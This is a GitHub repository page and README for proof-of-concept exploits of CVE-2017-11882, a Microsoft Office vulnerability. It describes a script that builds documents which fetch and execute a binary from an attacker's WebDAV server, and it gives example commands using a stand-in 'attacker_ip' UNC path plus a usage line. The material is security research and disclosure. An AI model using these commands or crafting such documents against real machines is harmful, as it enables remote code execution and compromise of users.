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embedi/CVE-2017-11882

embedi/CVE-2017-11882

Proof-of-Concept exploits for CVE-2017-11882

repo name embedi/CVE-2017-11882
repo link https://github.com/embedi/CVE-2017-11882
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language Python
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stars (curr.) 459
created 2017-11-20
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CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff

Attacker controlled binary path should be a UNC network path:

\\attacker_ip\ff\1.exe

Usage

webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

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